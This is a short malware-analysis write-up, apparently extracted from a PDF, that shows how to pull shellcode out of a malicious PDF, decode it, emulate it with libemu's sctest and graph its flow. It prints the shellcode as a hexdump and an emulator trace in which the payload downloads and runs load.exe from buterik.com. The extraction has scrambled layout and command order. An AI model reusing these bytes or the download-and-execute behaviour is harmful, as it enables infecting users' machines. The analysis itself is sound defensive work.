Using libemu to create malware flow graph

Muhammad Najmi Ahmad Zabidi najmi.zabidi@gmail.com∗

Abstract In this paper basically I just document my personal experience, that is the process of extracting shellcodes from PDF malware and later put it into Graphviz’s picture. I adapt most the examples are from the tutorial given by [Jeremy, 2008].

1

Introduction

In this write up I will show to you on how to extract shellcodes from PDF files.

2

PDF malware

Malicious PDF contains embedded Javascript (*.js). This Javascript may does harmful activity without the user’s consent.

3
3.1

Steps to extract shellcodes
Tools of trade

What we need to do basically use the existing tool. As of now I suggest you to download the following tools: • http://code.google.com/p/pyew/ • http://libemu.carnivore.it/ • http://www.graphviz.org/

3.2

Extracting the shellcode
¤ ¥

I used pdf example.py from the pyew package. § ¦
$ ls pdf_example . py -l - rwxr - xr - x 1 najmi najmi 1497 2010 -03 -30 20:03 pdf_example . py

Given that I have a PDF malware fetched from the wild:
∗ Thanks

to my wife, for providing hot coffee!

1

§
$ avgscan b c 6 6 f d 9 e 0 c 2 f 7 a 7 9 1 6 7 d a b 1 6 5 3 1 c 2 8 f 2 AVG command line Anti - Virus scanner Copyright ( c ) 2009 AVG Technologies CZ Virus database version : 271.1.1/2834 Virus database release date : Sun , 25 Apr 2010 14:31:00 +08:00 bc66fd9e0c2f7a79167dab16531c28f2 Files scanned Infections found PUPs found Files healed Warnings reported Errors reported : : : : : : 1(1) 1(1) 0 0 0 0 Virus found Script / Exploit

¤

¦

¥

By using the said tool in Section 3.1 above, I manually took the intended garbled shellcodes, which contains the following shellcodes:

Figure 1: PDF shellcodes in Pyew tool Now let us see the strings. Take out the following strings in between the unescape() brakets, and save it somewhere in a texeditor.

2

Figure 2: PDF shellcodes (Zoom mode) Now, we need to filter out the unintended strings, simply cut out using the following perl script:
cat shell . txt | perl - pe ’s /\% u (..)(..)/ chr ( hex ( $2 )). chr ( hex ( $1 ))/ ge ’ > filtered - shell . txt

Now, you should get the intended shellcodes. You actually can see a plain URL within that PDF shellcodes. Say, by using hexdump tool:
$hexdump -C filtered - shell . txt 00000000 00000010 00000020 00000030 00000040 00000050 00000060 00000070 00000080 00000090 000000 a0 000000 b0 000000 c0 000000 d0 000000 e0 000000 f0 00000100 00000110 00000120 00000130 00000140 00000150 00000160 00000170 00000180 00000190 000001 a0 000001 b0 90 33 11 15 98 19 79 68 eb 7b 3e 54 09 51 44 42 32 44 44 12 fd e2 e7 2a 5a f9 3a 32 90 11 11 11 54 47 fe f4 98 10 61 31 f9 15 09 ee 11 09 09 f0 9a 47 1e ef 9a e5 2f 33 90 43 11 11 15 79 df a9 54 48 f9 79 70 69 f9 64 11 f9 f9 92 6c 9a af 4f 4b ef 2f 2f 90 e2 9a 9a 47 34 f1 f9 09 9a 86 ee 11 74 51 31 11 01 11 fd 19 67 01 64 0d ee 62 6c 90 fa 51 fd 79 a1 71 d7 f8 44 11 11 11 11 11 41 7b 11 11 15 9a 31 2b f4 12 ee 75 6f 90 eb 1d 47 89 ee f9 11 16 09 11 11 11 11 11 42 11 11 11 4b 4c 12 e3 4b cc 44 74 61 eb 05 9a 79 ef d3 c5 11 10 47 11 11 12 ee 11 9a ee 11 11 42 1d e2 65 9a 9a 43 65 64 0f e8 61 9f 9b f9 11 11 11 f9 98 41 54 64 7b 54 64 7b 50 9a 47 22 19 fa 15 5d 72 2e 5b ec 0d 5f 1f f3 11 98 11 9a 54 9a 31 31 16 0d 31 ee 4a cb 9a d8 d0 9a 9a 5c 69 65 33 ff bc 1f f9 11 11 54 4f 11 0d 54 d6 9a 49 7b 9a 9a 43 f3 62 58 df 4b 12 5e 6b 78 c9 ff 9a fd e1 11 98 05 98 11 9a 05 11 54 12 14 54 54 12 e6 2d 50 1c 35 d4 5f 2e 65 66 ff 61 f9 11 11 54 51 64 11 d4 7b 4d 1d 54 48 19 01 f0 43 9a bc 12 12 4f 11 63 00 b9 81 19 ef 11 98 01 91 35 41 92 13 6f 7b 35 9a 7b 7b 12 ee 65 12 e3 cc 4c 68 6f 0a 80 75 90 11 11 54 47 29 9a 79 d1 48 3f 10 22 44 13 10 f0 f1 0f d2 51 77 d3 74 6d 01 b0 fd 11 98 1d 79 d2 54 27 41 9a 74 48 ca 09 48 48 12 44 69 47 fa 9a 19 74 2f 80 21 11 11 54 47 d0 64 15 0b 98 44 d6 9a 42 f9 9a 9a f0 9a 12 22 e0 1d 11 70 31 |........[3. f ....| |3. C .......... u .!| |.... Q .. a ... a ....| |..... Gy . _ .......| |. T . Gy .......... T | |. Gy4 ......... T . G | | y ... q ...... T . Gy .| | h ........ T . Q .). d | |.. T ...... O . d5 . T .| |{. H . D . G ..... Ay ’.| | > a ...... T ..... A .| | T1y .... A . T .{. H . D | |.. p .... T1 .. Mo ? t .| | Q . it ... d1 . T .{. H .| | D .. Q ...{. I . T5 ". B | | B . d1AB . T .{. H . D ..| |2...{.. d1 . T .{. H .| | D ......{.. T .{. H .| | D ...... PJC ......| |..... KB .... C .. D .| |.. l .. L . G .b -. e . i .| |. G . g1 ..". XP ... G "| |....+. e ...... Q ..| |*. Od . K ... K5 .. w ..| | Z . K ........ OL ...| |..... DC ]\^ _ . http | |:// buterik . com /1| |23/ load . exe ..|

3

Now, we need to call the libemu’s tool called sctest. By using the following command: § ¦ §
verbose = 1 success offset = 0 x00000017 Hook me Captain Cook ! userhooks . c :132 u s e r _ h o o k _ E x i t T h r e a d ExitThread ( -1) stepcount 314316 HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0 x00417195 = > = " URLMON "; ) = 0 x7df20000 ; UINT G e t S y s t e m D i r e c t o r y ( LPTSTR lpBuffer = 0 x0012fae8 = > = " c :\ WINDOWS \ system32 "; UINT uSize = 255; ) = 19; ERROR DeleteFile ( LPCTSTR lpFileName = 0 x0012fae8 = > none ; ) = -1; HRESULT U R L D o w n l o a d T o F i l e ( LPUNKNOWN pCaller = 0 x00000000 = > none ; LPCTSTR szURL = 0 x0041719c = > = " http :// buterik . com /123/ load . exe "; LPCTSTR szFileName = 0 x0012fae8 = > = " c :\ WINDOWS \ system32 \~. exe "; DWORD dwReserved = 0; L P B I N D S T A T U S C A L L B A C K lpfnCB = 0; ) = 0; UINT WINAPI WinExec ( LPCSTR lpCmdLine = 0 x0012fae8 = > = " c :\ WINDOWS \ system32 \~. exe "; UINT uCmdShow = 0; ) = 32; void ExitThread ( DWORD dwExitCode = -1; ) = 0; sctest - Sgs 1000000 -v < filtered - shell -. txt

¤ ¥ ¤ It will creates the following output:

¦

¥

Now, if you want to create a flow graph, we need to add an extra flag, -G flag to the tool’s execution.
sctest - Sgs 1000000 -v -G shell . dot < filtered - shell - b c 6 6 f d 9 e 0 c 2 f 7 a 7 9 1 6 7 d a b 1 6 5 3 1 c 2 8 f 2 . txt

Next, execute the dot command (from Graphviz package): § ¦ This will create a PNG file which contains the following graph:
dot shell . dot - Tpng -o shell . png

¤ ¥

4

5

6

References
[Jeremy, 2008] Jeremy (2008). http://www.sudosecure.net/archives/313.

7